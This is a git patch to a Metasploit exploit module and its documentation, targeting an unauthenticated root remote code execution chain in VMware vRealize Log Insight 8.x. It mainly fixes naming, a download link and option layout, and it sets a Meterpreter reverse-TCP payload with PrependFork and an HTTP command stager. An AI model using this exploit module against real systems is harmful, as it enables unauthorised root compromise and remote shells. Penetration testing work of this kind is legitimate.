From 21dde19511f459b6cd411dcda305edb43d2960ba Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Fri, 8 Sep 2023 16:55:42 -0400 Subject: [PATCH] Make some final tweaks Change strings to reference `VMware` using the proper case. Don't include CmdStager (because it's unnecessary). Set PrependFork to fix shell payloads. Move CamelCase options to advanced. --- .../exploit/linux/http/vmware_vrli_rce.md | 4 ++-- modules/exploits/linux/http/vmware_vrli_rce.rb | 18 +++++++++++++----- 2 files changed, 15 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/linux/http/vmware_vrli_rce.md b/documentation/modules/exploit/linux/http/vmware_vrli_rce.md index 21907a601748..09320c9e9935 100644 --- a/documentation/modules/exploit/linux/http/vmware_vrli_rce.md +++ b/documentation/modules/exploit/linux/http/vmware_vrli_rce.md @@ -5,7 +5,7 @@ in any environment. This highly scalable log management solution delivers intuit dashboards, sophisticated analytics, and broad third-party extensibility across physical, virtual, and cloud environments. -VMWare vRealize Log Insightis versions v8.x contain multiple vulnerabilities, such as +VMware vRealize Log Insights versions v8.x contain multiple vulnerabilities, such as directory traversal, broken access control, deserialization, and information disclosure. When chained together, these vulnerabilities allow a remote, unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. @@ -24,7 +24,7 @@ Check [here](https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001- For installing the vulnerable version follow the steps below, 1. To obtain the vulnerable OVA image, first create a customer account at [VMware](https://customerconnect.vmware.com/account-registration) (trial license is sufficient) -2. Navigate [here](https://customerconnect.vmware.com/account-registration) and download `Virtual Appliance` +2. Navigate [here](https://customerconnect.vmware.com/downloads/details?downloadGroup=VRLI-8102&productId=1351) and download `Virtual Appliance` 3. Import the OVA image into a virtualization software (VirtualBox is used for this case). 4. Start the `VMware_vCenter_Log_Insight` image and proceed with the initial installation steps through the web interface of the product. diff --git a/modules/exploits/linux/http/vmware_vrli_rce.rb b/modules/exploits/linux/http/vmware_vrli_rce.rb index be8b99477abb..5b8ce39b3594 100644 --- a/modules/exploits/linux/http/vmware_vrli_rce.rb +++ b/modules/exploits/linux/http/vmware_vrli_rce.rb @@ -10,7 +10,8 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager + include Msf::Exploit::EXE + include Msf::Exploit::CmdStager::HTTP include Msf::Exploit::Retry include Msf::Exploit::FileDropper # includes register_files_for_cleanup prepend Msf::Exploit::Remote::AutoCheck @@ -21,9 +22,9 @@ def initialize(info = {}) super( update_info( info, - 'Name' => 'VMWare vRealize Log Insight Unauthenticated RCE', + 'Name' => 'VMware vRealize Log Insight Unauthenticated RCE', 'Description' => %q{ - VMWare vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as + VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as directory traversal, broken access control, deserialization, and information disclosure. When chained together, these vulnerabilities allow a remote, unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. @@ -63,7 +64,8 @@ def initialize(info = {}) 'Type' => :linux_dropper, 'DefaultOptions' => { 'SSL' => true, - 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', + 'PrependFork' => true } } ] @@ -86,7 +88,12 @@ def initialize(info = {}) Opt::RPORT(443), OptPort.new('THRIFT_PORT', [true, 'Thrift service port', 16520]), OptInt.new('THRIFT_TIMEOUT', [true, 'Timeout duration for thrift service', 10]), - OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/']), + OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/']) + ] + ) + + register_advanced_options( + [ OptInt.new('WaitForResponseTimeout', [ true, 'The timeout in seconds for RemotePakDownload response', 10 ]), OptInt.new('WaitForUpgradeDuration', [ true, 'The sleep duration in seconds for PakUpgrade process', 2 ]) ] @@ -246,6 +253,7 @@ def on_request_uri(cli, _request) def exploit # This is important check... fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/ + # Step 1 generate malicious TAR archive file_name = Rex::Text.rand_text_alpha(7) pak_name = "#{file_name}.pak"